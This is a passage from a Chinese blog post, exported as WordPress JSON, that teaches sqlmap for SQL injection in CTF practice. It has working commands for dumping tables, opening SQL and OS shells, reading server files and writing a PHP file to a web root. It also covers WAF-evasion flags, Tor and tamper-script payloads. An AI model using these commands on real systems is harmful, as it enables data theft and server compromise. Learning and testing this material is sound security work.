{"id":1367,"date":"2023-04-07T16:41:29","date_gmt":"2023-04-07T08:41:29","guid":{"rendered":"https:\/\/fushuling.com\/?p=1367"},"modified":"2024-03-05T19:35:38","modified_gmt":"2024-03-05T11:35:38","slug":"sql%e6%b3%a8%e5%85%a5%e4%b8%80%e5%91%bd%e9%80%9a%e5%85%b3","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/04\/07\/sql%e6%b3%a8%e5%85%a5%e4%b8%80%e5%91%bd%e9%80%9a%e5%85%b3\/","title":{"rendered":"SQL\u6ce8\u5165\u4e00\u547d\u901a\u5173!"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">\u524d\u8a00<\/h1>\n\n\n\n<p>SQL\u6ce8\u5165\u5411\u6765\u662fWeb\u5c0f\u5b50\u6700\u91cd\u8981\u7684\u57fa\u672c\u6280\u80fd\u4e4b\u4e00\uff0c\u57fa\u672c\u4e0a\u6bcf\u6b21\u9762\u8bd5\u9762\u8bd5\u5b98\u90fd\u4f1a\u95ee\u5230SQL\u6ce8\u5165\u76f8\u5173\u7684\u95ee\u9898\uff0c\u4f46\u611f\u89c9\u7f51\u4e0a\u5f88\u591a\u603b\u7ed3\u90fd\u4e0d\u662f\u5f88\u5168\uff0c\u5982\u679c\u662f\u6211\u548c\u5176\u4ed6\u4eba\u804aSQL\u7684\u8bdd\uff0c\u4f1a\u6d89\u53ca\u5f88\u591a\u65b9\u9762\uff0c\u81f3\u5c11\u80fd\u804a\u4e2a\u534a\u4e2a\u5c0f\u65f6\u4ee5\u4e0a\uff0c\u8ba9\u9762\u8bd5\u5b98\u72e0\u72e0\u773c\u524d\u4e00\u4eae\uff0c\u56e0\u6b64\u5f00\u4e2a\u8fd9\u4e2a\u6587\u7ae0\u65e2\u4f5c\u4e3a\u81ea\u5df1\u7684\u603b\u7ed3\uff0c\u53c8\u4f9b\u4ed6\u4eba\u5b66\u4e60\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">sqlmap<\/h1>\n\n\n\n<p>\u804asql\u6ce8\u5165\u5c31\u4e0d\u80fd\u4e0d\u804asqlmap\uff0c\u5c31\u50cf\u63d0\u5f00\u653e\u4e16\u754c\u4e0d\u80fd\u4e0d\u63d0\u539f\u795e\u4e00\u6837\uff0csqlmap\u662f\u811a\u672c\u5c0f\u5b50\u6700\u91cd\u8981\u7684\u5de5\u5177\u4e4b\u4e00\uff0c\u4ed6\u53ef\u4ee5\u514d\u53bb\u4f60\u81ea\u5df1\u5199\u811a\u672c\u7684\u9ebb\u70e6\uff0c\u76f4\u63a5\u5bf9\u76ee\u6807\u4e00\u628a\u68ad\uff0c\u9664\u6b64\u4e4b\u5916sqlmap\u7684\u8bbe\u8ba1\u6a21\u5f0f\u4ee5\u53ca\u6e90\u7801\u4e5f\u6709\u5f88\u591a\u503c\u5f97\u79f0\u8d5e\u7684\u4e1c\u897f\uff0c\u968f\u4fbf\u5728\u7f51\u4e0a\u4e00\u641c\u5c31\u80fd\u641c\u5230\u5f88\u591a\u5bf9sqlmap\u6e90\u7801\u7684\u5206\u6790\uff0c\u5f88\u591a\u65f6\u5019\u9762\u8bd5\u5b89\u5168\u5f00\u53d1\u9762\u8bd5\u5b98\u4e5f\u4f1a\u76f4\u63a5\u4e86\u5f53\u7684\u8be2\u95ee\u4f60\u6709\u6ca1\u6709\u53bb\u770b\u8fc7sqlmap\u7684\u6e90\u7801\u3002\u4e0d\u8fc7\u4eca\u5929\u5c31\u5148\u4e0d\u804asqlmap\u7684\u6e90\u7801\u4e86\uff0c\u4ee5\u540e\u6709\u673a\u4f1a\u53ef\u4ee5\u518d\u5f00\u4e2a\u6587\u7ae0\u8bb2\u8bb2sqlmap\u7684\u6e90\u7801\uff0c\u8fd9\u7bc7\u6587\u7ae0\u5c31\u53ea\u8bb2\u8bb2sqlmap\u7684\u4f7f\u7528\u3002(\u8bb0\u5f97\u4e4b\u524d\u6bd4\u8d5b\u65f6\u9047\u5230\u8fc7\u4e00\u9053sql\u9898\uff0c\u5168\u573a\u5c31\u4e00\u4e24\u89e3\uff0c\u7ed3\u679c\u6700\u540e\u770b\u5230wp\u5176\u5b9e\u662f\u53ef\u4ee5\u76f4\u63a5sqlmap\u4e00\u628a\u68ad\u51fa\u6765\u7684\uff0c\u6709\u70b9\u5c0f\u4e11\u4e86)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b80\u4ecb<\/h2>\n\n\n\n<p>\u53c2\u8003<a href=\"https:\/\/blog.csdn.net\/Gherbirthday0916\/article\/details\/126857683\">\u53f2\u4e0a\u6700\u8be6\u7ec6\u7684sqlmap\u4f7f\u7528\u6559\u7a0b<\/a>\uff0c\u6284\u4e00\u4e0b\u7b80\u4ecb\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>sqlmap\u662f\u4e00\u4e2a\u81ea\u52a8\u5316\u7684SQL\u6ce8\u5165\u5de5\u5177\uff0c\u5176\u4e3b\u8981\u529f\u80fd\u662f\u626b\u63cf\uff0c\u53d1\u73b0\u5e76\u5229\u7528\u7ed9\u5b9a\u7684URL\u8fdb\u884cSQL\u6ce8\u5165\u3002\u76ee\u524d\u652f\u6301\u7684\u6570\u636e\u5e93\u6709MySql\u3001Oracle\u3001Access\u3001PostageSQL\u3001SQL Server\u3001IBM DB2\u3001SQLite\u3001Firebird\u3001Sybase\u548cSAP MaxDB\u7b49\uff0c\u540c\u65f6sqlmap\u7684\u5f00\u53d1\u8005\u662f\u56fd\u9645\u77e5\u540d\u6218\u961fSuper Guesser\u7684\u6210\u5458\u4e4b\u4e00\uff0c\u5728\u56fd\u9645\u8d5b\u573a\u6709\u5341\u5206\u4eae\u773c\u7684\u6210\u7ee9\u3002<\/p>\n<\/blockquote>\n\n\n\n<p>sqlmap\u662fkali\u91cc\u7684\u5185\u7f6e\u5de5\u5177\uff0c\u5b83\u652f\u63015\u79cdSQL\u6ce8\u5165\u6280\u672f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5e03\u5c14\u76f2\u6ce8\uff0c\u9875\u9762\u65e0\u56de\u663e\u65f6\uff0c\u5229\u7528\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6765\u5224\u65ad\u67e5\u8be2\u8bed\u53e5\u6b63\u786e\u4e0e\u5426<\/li>\n\n\n\n<li>\u65f6\u95f4\u76f2\u6ce8\uff0c\u9875\u9762\u65e0\u56de\u663e\u65f6\uff0c\u5229\u7528\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u5df2\u7ecf\u6267\u884c\u6765\u5224\u65ad\u67e5\u8be2\u8bed\u53e5\u6b63\u786e\u4e0e\u5426<\/li>\n\n\n\n<li>\u62a5\u9519\u6ce8\u5165\uff0c\u5373\u5229\u7528\u62a5\u9519\u4fe1\u606f\u8fdb\u884c\u6ce8\u5165<\/li>\n\n\n\n<li>\u8054\u5408\u6ce8\u5165\uff0c\u5373Union\u8054\u5408\u6ce8\u5165<\/li>\n\n\n\n<li>\u5806\u53e0\u6ce8\u5165\uff0c\u5373\u5728\u5141\u8bb8\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u65f6\uff0c\u5229\u7528\u9017\u53f7\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u7684\u6ce8\u5165<\/li>\n<\/ul>\n\n\n\n<p>\u5f53\u7136\u8fd9\u4e9b\u6ce8\u5165\u65b9\u6cd5\u53ea\u80fd\u8bf4\u662fweb\u5c0f\u5b50\u7684\u57fa\u672c\u529f\uff0c\u5927\u4f19\u90fd\u4f1a\uff0c\u9664\u4e86\u6ce8\u5165\u4e4b\u5916\uff0csqlmap\u8fd8\u652f\u6301\u6570\u636e\u5e93\u6307\u7eb9\u8bc6\u522b\u3001\u6570\u636e\u5e93\u679a\u4e3e\u3001\u6570\u636e\u63d0\u53d6\u3001\u8bbf\u95ee\u76ee\u6807\u6587\u4ef6\u7cfb\u7edf\uff0c\u5e76\u5728\u83b7\u53d6\u5b8c\u5168\u7684\u64cd\u4f5c\u6743\u9650\u65f6\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684\u539f\u7406\u662f\u5229\u7528\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570sys_exec( )\u548csys_eval()\u6216\u8005\u76f4\u63a5\u5199\u9a6c\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u57fa\u7840\u547d\u4ee4<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>-u  \"url\"\t\t#\u68c0\u6d4b\u6ce8\u5165\u70b9\n--dbs\t\t\t#\u5217\u51fa\u6240\u6709\u6570\u636e\u5e93\u7684\u540d\u79f0\n--current-db\t        #\u5217\u51fa\u5f53\u524d\u6570\u636e\u5e93\u7684\u540d\u79f0\n-D\t\t\t#\u6307\u5b9a\u4e00\u4e2a\u6570\u636e\u5e93\n--table\t\t\t#\u5217\u51fa\u6240\u6709\u8868\u540d\n-T\t\t\t#\u6307\u5b9a\u8868\u540d\n--columns\t\t#\u5217\u51fa\u6240\u6709\u5b57\u6bb5\u540d\n-C\t\t\t#\u6307\u5b9a\u5b57\u6bb5\n-dump\t\t\t#\u5217\u51fa\u5b57\u6bb5\u5185\u5bb9\n<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u5982\u679c\u6211\u4eec\u60f3\u8981\u62ff\u5230www.dingzhen.com\u8fd9\u4e2a\u7f51\u7ad9ctfshow_web\u8fd9\u4e2a\u6570\u636e\u5e93\u91ccctfshow_user\u8fd9\u4e2a\u8868\u4e0bpass\u5b57\u6bb5\u7684\u6240\u6709\u6570\u636e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u www.dingzhen.com\/?id=1 -D ctfshow_web -T ctfshow_user -C pass -dump <\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u662f\u60f3\u4f7f\u7528POST\u65b9\u6cd5\u6ce8\u5165\u7684\u8bdd\uff0c\u6211\u4eec\u53ef\u4ee5\u628a\u8bf7\u6c42\u5305\u4fdd\u5b58\u4e3asql.txt\uff0c\u7528-p\u6307\u5b9a\u6ce8\u5165\u53c2\u6570\uff0c\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -r sql.txt -p id --dump<\/code><\/pre>\n\n\n\n<p>\u6216\u8005\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -r sql.txt --data=\"id=1\" --dump <\/code><\/pre>\n\n\n\n<p><strong>&#8211;sql-shell:\u8fd0\u884c\u81ea\u5b9a\u4e49SQL\u8bed\u53e5<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/4b8b52ce-89a7-43a2-b5a0-49f2ea4ef6a0.challenge.ctf.show\/api\/?id=1  --refer=ctf.show --sql-shell<\/code><\/pre>\n\n\n\n<p>\u8f93\u5165\u540e\u4f1a\u6709\u4e00\u4e2asql-shell&gt;\uff0c\u5728\u8fd9\u91cc\u8f93\u5165\u81ea\u5df1\u7684\u547d\u4ee4\u5373\u53ef\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"83\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-8.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1370\"  sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/div><\/figure>\n\n\n\n<p><strong>&#8211;os-cmd, &#8211;os-shell:\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/strong><\/p>\n\n\n\n<p>\u5f53\u4e3aMySQL\u6570\u636e\u5e93\u65f6\uff0c\u9700\u6ee1\u8db3\u4e0b\u9762\u6761\u4ef6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5f53\u524d\u7528\u6237\u4e3a root<\/li>\n\n\n\n<li>\u77e5\u9053\u7f51\u7ad9\u6839\u76ee\u5f55\u7684\u7edd\u5bf9\u8def\u5f84<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/4b8b52ce-89a7-43a2-b5a0-49f2ea4ef6a0.challenge.ctf.show\/api\/?id=1  --refer=ctf.show --os-shell <\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u8ba9\u6211\u4eec\u9009\u62e9\u7f51\u7ad9\u7684\u811a\u672c\u8bed\u8a00\u4ee5\u53ca\u5224\u65ad\u7f51\u7ad9\u53ef\u5199\u76ee\u5f55\u7684\u65b9\u6cd5\uff0c\u65b9\u6cd5\u5206\u522b\u662f\u4f7f\u7528\u516c\u5171\u7684\u9ed8\u8ba4\u76ee\u5f55<br>\u3001\u81ea\u5b9a\u4e49\u7f51\u7edc\u6839\u76ee\u5f55\u7edd\u5bf9\u8def\u5f84\u3001\u6307\u5b9a\u81ea\u5b9a\u4e49\u7684\u8def\u5f84\u6587\u4ef6\u3001\u66b4\u529b\u7834\u89e3\uff0c\u6211\u4eec\u5206\u522b\u9009\u62e94-&gt;php\u4ee5\u53ca1-&gt;\u9ed8\u8ba4\u76ee\u5f55\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"793\" height=\"266\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1371\"  sizes=\"auto, (max-width: 793px) 100vw, 793px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5373\u53ef\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-10.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"647\" height=\"281\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-10.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1372\"  sizes=\"auto, (max-width: 647px) 100vw, 647px\" \/><\/div><\/figure>\n\n\n\n<p><strong>&#8211;file-read:\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx\/sqli\/Less-4\/?id=1\" --file-read \"c:\/test.txt\"<\/code><\/pre>\n\n\n\n<p><strong>\u4e0a\u4f20\u6587\u4ef6\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d(\u2014file-write \u2014file-dest<\/strong><\/p>\n\n\n\n<p>\u4f46\u6211\u4eec\u5fc5\u987b\u77e5\u9053\u76ee\u6807\u670d\u52a1\u5668\u7684\u7edd\u5bf9\u8def\u5f84\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/xxx\/sqli-labs\/Less-2\/?id=1  --file-write C:\\Users\\mi\\Desktop\\1.php --file-dest \"C:\\phpStudy\\PHPTutorial\\WWW\\2.php\" <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7ed5waf<\/h2>\n\n\n\n<p>\u5f53\u7136\u8fd9\u53ea\u662f\u6700\u57fa\u7840\u7684\u6ce8\u5165\u65b9\u5f0f\uff0c\u5f88\u5bb9\u6613\u88abwaf\u68c0\u6d4b\u5230\uff0c\u4e3a\u4e86\u589e\u52a0\u9690\u853d\u6027\uff0c\u6211\u4eec\u53ef\u4ee5\u589e\u52a0\u5176\u4ed6\u53c2\u6570\u89c4\u907f\u98ce\u9669\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>--random-agent    \u4f7f\u7528\u4efb\u610fHTTP\u5934\u8fdb\u884c\u7ed5\u8fc7\uff0c\u5c24\u5176\u662f\u5728WAF\u914d\u7f6e\u4e0d\u5f53\u7684\u65f6\u5019\n--time-sec=3      \u4f7f\u7528\u957f\u7684\u5ef6\u65f6\u6765\u907f\u514d\u89e6\u53d1WAF\u7684\u673a\u5236\uff0c\u8fd9\u65b9\u5f0f\u6bd4\u8f83\u8017\u65f6\n--hpp             \u4f7f\u7528HTTP \u53c2\u6570\u6c61\u67d3\u8fdb\u884c\u7ed5\u8fc7\uff0c\u5c24\u5176\u662f\u5728ASP.NET\/IIS \u5e73\u53f0\u4e0a\n--proxy=100.100.100.100:8080 --proxy-cred=211:985      \u4f7f\u7528\u4ee3\u7406\u8fdb\u884c\u7ed5\u8fc7\n--ignore-proxy    \u7981\u6b62\u4f7f\u7528\u7cfb\u7edf\u7684\u4ee3\u7406\uff0c\u76f4\u63a5\u8fde\u63a5\u8fdb\u884c\u6ce8\u5165\n--flush-session   \u6e05\u7a7a\u4f1a\u8bdd\uff0c\u91cd\u6784\u6ce8\u5165\n--hex \u6216\u8005 --no-cast     \u8fdb\u884c\u5b57\u7b26\u7801\u8f6c\u6362\n--mobile          \u5bf9\u79fb\u52a8\u7aef\u7684\u670d\u52a1\u5668\u8fdb\u884c\u6ce8\u5165\n--tor             \u533f\u540d\u6ce8\u5165<\/code><\/pre>\n\n\n\n<p>\u9664\u6b64\u4e4b\u5916\u8fd8\u6709\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u4f7f\u7528--user-agent \u6307\u5b9aagent\n\u4f7f\u7528--referer \u7ed5\u8fc7referer\u68c0\u67e5\n\u4f7f\u7528--method \u8c03\u6574sqlmap\u7684\u8bf7\u6c42\u65b9\u5f0f \u5982PUT\n\u4f7f\u7528--cookie \u63d0\u4ea4cookie\u6570\u636e<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u4f8b\u5b50\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/01c7d214-3aa8-43db-be16-b210d02ac965.challenge.ctf.show\/api\/index.php  --cookie=3089874dc14bcc794d70b21cdd8bb544  --method=PUT --headers=\"Content-Type: text\/plain\" --data=\"id=1\" --refer=ctf.show --current-db --tables -T ctfshow_user --columns  -C pass -dump<\/code><\/pre>\n\n\n\n<p>sqlmap\u8fd8\u6709\u6709\u63a2\u6d4b\u7b49\u7ea7\u548c\u5371\u9669\u7b49\u7ea7(\u2014level \u2014risk)\u7684\u8bbe\u7f6e\uff1a<br>sqlmap\u4e00\u5171\u67095\u4e2a\u63a2\u6d4b\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u662f1\u3002\u7b49\u7ea7\u8d8a\u9ad8\uff0c\u8bf4\u660e\u63a2\u6d4b\u65f6\u4f7f\u7528\u7684payload\u4e5f\u8d8a\u591a\u3002\u5176\u4e2d5\u7ea7\u7684payload\u6700\u591a\uff0c\u4f1a\u81ea\u52a8\u7834\u89e3\u51facookie\u3001XFF\u7b49\u5934\u90e8\u6ce8\u5165\u3002\u5f53\u7136\uff0c\u7b49\u7ea7\u8d8a\u9ad8\uff0c\u63a2\u6d4b\u7684\u65f6\u95f4\u4e5f\u8d8a\u6162\u3002\u8fd9\u4e2a\u53c2\u6570\u4f1a\u5f71\u54cd\u6d4b\u8bd5\u7684\u6ce8\u5165\u70b9\uff0cGET\u548cPOST\u7684\u6570\u636e\u90fd\u4f1a\u8fdb\u884c\u6d4b\u8bd5\uff0cHTTP cookie\u5728level\u4e3a2\u65f6\u5c31\u4f1a\u6d4b\u8bd5\uff0cHTTP User-Agent\/Referer\u5934\u5728level\u4e3a3\u65f6\u5c31\u4f1a\u6d4b\u8bd5\u3002\u5728\u4e0d\u786e\u5b9a\u54ea\u4e2a\u53c2\u6570\u4e3a\u6ce8\u5165\u70b9\u65f6\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u51c6\u786e\u6027\uff0c\u5efa\u8bae\u8bbe\u7f6elevel\u4e3a5\u3002<\/p>\n\n\n\n<p>sqlmap\u4e00\u5171\u67093\u4e2a\u5371\u9669\u7b49\u7ea7\uff0c\u4e5f\u5c31\u662f\u8bf4\u4f60\u8ba4\u4e3a\u8fd9\u4e2a\u7f51\u7ad9\u5b58\u5728\u51e0\u7ea7\u7684\u5371\u9669\u7b49\u7ea7\u3002\u548c\u63a2\u6d4b\u7b49\u7ea7\u4e00\u4e2a\u610f\u601d\uff0c\u5728\u4e0d\u786e\u5b9a\u7684\u60c5\u51b5\u4e0b\uff0c\u5efa\u8bae\u8bbe\u7f6e\u4e3a3\u7ea7<\/p>\n\n\n\n<p>\u6bd4\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx:7777\/Less-1\/\" --level=5 --risk=3 <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">tamper\u811a\u672c<\/h2>\n\n\n\n<p>\u6709\u65f6\u5019\u6211\u4eec\u7684\u6ce8\u5165\u4f1a\u9047\u5230\u5173\u952e\u5b57\u88abban\u7684\u60c5\u51b5\uff0csqlmap\u91cc\u5b58\u5728\u81ea\u5e26\u7684\u66ff\u4ee3\u811a\u672c\uff0c\u7528\u6cd5\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx\/Less-1\/?id=1\" --tamper=\"space2comment.py,space2plus.py\"<\/code><\/pre>\n\n\n\n<p>\u5177\u4f53tamper\u7684\u5185\u5bb9\u53ef\u4ee5\u770b\u5230<a href=\"https:\/\/blog.csdn.net\/weixin_49183673\/article\/details\/123371793\">sqlmap\u4e2dtamper\u7684\u7528\u6cd5<\/a>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>1\u3001apostrophemask.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06\u5f15\u53f7\u66ff\u6362\u4e3autf-8\uff0c\u7528\u4e8e\u8fc7\u6ee4\u5355\u5f15\u53f7\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper(\"1 AND '1'='1\")\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 AND %EF%BC%871%EF%BC%87=%EF%BC%871\n\n<strong>2\u3001base64encode.py\n<\/strong>\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u66ff\u6362base64\u7f16\u7801\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper(\"1' AND SLEEP(5)#\")\n\u4f7f\u7528\u811a\u672c\u540e\uff1aMScgQU5EIFNMRUVQKDUpIw==\n<strong>\n3\u3001multiplespaces.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u56f4\u7ed5sql\u5173\u952e\u5b57\u6dfb\u52a0\u591a\u4e2a\u7a7a\u683c\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 UNION SELECT foobar')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 UNION SELECT foobar\n\n<strong>4\u3001space2plus.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528:\u7528\u52a0\u53f7\u66ff\u6362\u7a7a\u683c\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aSELECT+id+FROM+users\n\n<strong>5\u3001space2randomblank.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\u5176\u4ed6\u968f\u673a\u6709\u6548\u5b57\u7b26\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aSELECT%0Did%0CFROM%0Ausers\n\n<strong>6\u3001unionalltounion.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06union all select \u66ff\u6362\u4e3aunion select\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('-1 UNION ALL SELECT')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a-1 UNION SELECT\n\n<strong>7\u3001space2dash.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aALL\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\u7834\u6298\u53f7\uff08--\uff09\uff0c\u5e76\u6dfb\u52a0\u4e00\u4e2a\u968f\u673a\u5b57\u7b26\u548c\u6362\u884c\u7b26\uff08\\n\uff09\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 AND 9227=9227')\n\u9002\u7528\u811a\u672c\u540e\uff1a1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227\n\n<strong>8\u3001space2mssqlblank.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1amssql\n\u6d4b\u8bd5\u6570\u636e\u5e93\u7248\u672c\uff1aMicrosoft SQL Server 2000 \u3001Microsoft SQL Server 2005\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\u6709\u6548\u5b57\u7b26\u96c6\u7684\u968f\u673a\u7a7a\u767d\u5b57\u7b26('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u9002\u7528\u811a\u672c\u540e\uff1aSELECT%0Did%0DFROM%04users\n\n<strong>9\u3001between.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005 \u3001MySQL 4, 5.0 and 5.5\u3001 Oracle 10g\u3001 PostgreSQL 8.3, 8.4, 9.0\n\u4f5c\u7528\uff1a\u5c06\"&gt;\"\u66ff\u6362\u4e3a\"NOT BETWEEN 0 AND #\"\uff0c\u5c06\"=\"\u66ff\u6362\u4e3a\"BETWEEN # AND #\"\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 AND A &gt; B--')\uff0ctamper('1 AND A = B--')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 AND A NOT BETWEEN 0 AND B--\uff0c1 AND A BETWEEN B AND B--\n\n<strong>10\u3001percentage.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aASP\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2000, 2005 \u3001MySQL 5.1.56, 5.5.11 \u3001PostgreSQL 9.0\n\u4f5c\u7528\uff1a\u5728\u6bcf\u4e2a\u5b57\u7b26\u524d\u52a0\u4e0a\u4e00\u4e2a%\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT FIELD FROM TABLE')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M 